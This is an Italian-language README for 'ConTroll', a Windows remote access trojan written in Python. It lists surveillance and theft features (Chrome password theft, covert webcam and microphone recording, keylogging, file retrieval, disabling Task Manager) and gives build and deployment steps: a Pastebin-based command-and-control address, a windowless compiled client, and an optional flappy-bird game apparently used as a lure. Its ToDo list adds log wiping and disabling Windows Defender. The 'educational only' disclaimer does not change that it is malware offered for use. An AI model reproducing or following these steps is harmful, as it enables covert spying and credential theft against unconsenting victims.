
DISCLAIMER
ConTroll è solo per scopi educativi/di ricerca. L'autore NON si assume alcuna responsabilità per come scegli di utilizzare uno qualsiasi degli strumenti/codice sorgente/file forniti. L'autore e chiunque sia affiliato non saranno responsabili per eventuali perdite e/o danni in connessione con l'uso di QUALSIASI file fornito con ConTroll. Usando ConTroll o qualsiasi file incluso, comprendi che ACCETTI DI UTILIZZARLO A TUO RISCHIO.
Ancora una volta, ConTroll e TUTTI i file inclusi sono SOLO per scopi di EDUCAZIONE e/o RICERCA. ConTroll è pensato SOLO per essere utilizzato nei tuoi laboratori di pentesting o con il consenso esplicito del proprietario del sistema testato.
ConTroll - Remote Access Trojan (RAT)
Guarda il video di presentazione qui
Creato un trojan ad accesso remoto che stabilirà un controllo amministrativo su qualsiasi macchina Windows compromessa.

AGGIORNAMENTI DOPO LA PRESENTAZIONE VIDEO
- Aggiornamento remoto dell'indirizzo IP e della porta a cui il client deve comunicare
- Inserimento dell'indirizzo IP all'esecuzione del server
- Disabilitazione del task manager
Caratteristiche
- Blocca lo schermo della vittima.
- Riconnessione automatica al server.
- Crea una finestra popup personalizzata.
- Recupera file dalla macchina della vittima.
- Ottieni informazioni sulla macchina della vittima.
- Ruba le password salvate in Chrome.
- Attiva la webcam di un sistema e registra video.
- Attiva il microfono del sistema e registra audio.
- Termina qualsiasi processo in esecuzione sulla macchina della vittima.
- Monitora il comportamento dell'utente tramite funzionalità keylogger (tasti premuti e screenshot).
- Disabilita il Task Manager. (ATTENZIONE: POTRESTI VOLER DISABILITARE QUESTA FUNZIONE SE ESEGUITO LOCALMENTE)
Requisiti
Ti serve un'architettura OS a 32 bit per compilare i binari. Quindi usa un sistema win 32 o unix 32 per eseguire e compilare il codice
- python 2.x
- opencv
- numpy
- pyhook
- pythoncom
- pyinstaller
- pygame
- py2exe
- pyAudio
Utilizzo
NUOVO
CREA UN ACCOUNT PASTEBIN, CREA UN NUOVO PASTE CON L'INDIRIZZO IP E IL NUMERO DI PORTA A CUI VUOI CHE IL CLIENT INVII LE RISPOSTE. L'INDIRIZZO IP E IL NUMERO DI PORTA DEVONO ESSERE SEPARATI DA DUE PUNTI IN QUESTO MODO 192.168.12.14:5000. DOPO AVER CREATO IL POST, CLICCA SU RAW, QUESTO DOVRESTI ESSERE REINDIRIZZATO A UNA PAGINA CON SOLO L'INDIRIZZO IP E IL NUMERO DI PORTA; COPIA QUEL LINK E INCOLLALO IN CLIENT.PYW NELLA FUNZIONE getIpAddress. SE PER QUALSIASI MOTIVO VUOI AGGIORNARE L'IP E/O LA PORTA A CUI VUOI CHE IL CLIENT SI COLLEGHI, ACCEDI AL TUO ACCOUNT PASTEBIN E APPORTA LE MODIFICHE, SALVA E IL CLIENT ADOTTERÀ QUESTE MODIFICHE.
- Clona la repo
git clone https://github.com/Lithium95/ConTroll_Remote_Access_Trojan.git
- Installa opencv e numpy da requirements.txt
python -m pip install -r requirements.txt
-
Scarica e installa pyHook
-
Scarica e installa pythoncom
-
Scarica la wheel di pyAudio
-
Installa il file wheel
python -m pip install PyAudio-0.2.11-cp27-cp27m-win32.whl
- Usa pyinstaller per compilare il binario del client
python pyinstaller.py --onefile --windowed client.pyw
Salta i prossimi 2 passaggi se non vuoi usare il gioco flappy bird
- Configura un server locale per ospitare il client.exe. Usa live-server
- Usa py2exe per compilare il gioco flappy bird
L'exe del gioco flappy bird si troverà in una cartella chiamata 'dist'
- Esegui il server
- Attendi che il client si connetta
ToDo
- Rendere il RAT multipiattaforma
- Cancellare i log di Sistema, Sicurezza e Applicazione
- Crittografare la comunicazione tra server e client
- Modificare le proprietà di accesso, creazione e modifica dei file
- Abilitare/Disabilitare servizi come RDP, UAC e Windows Defender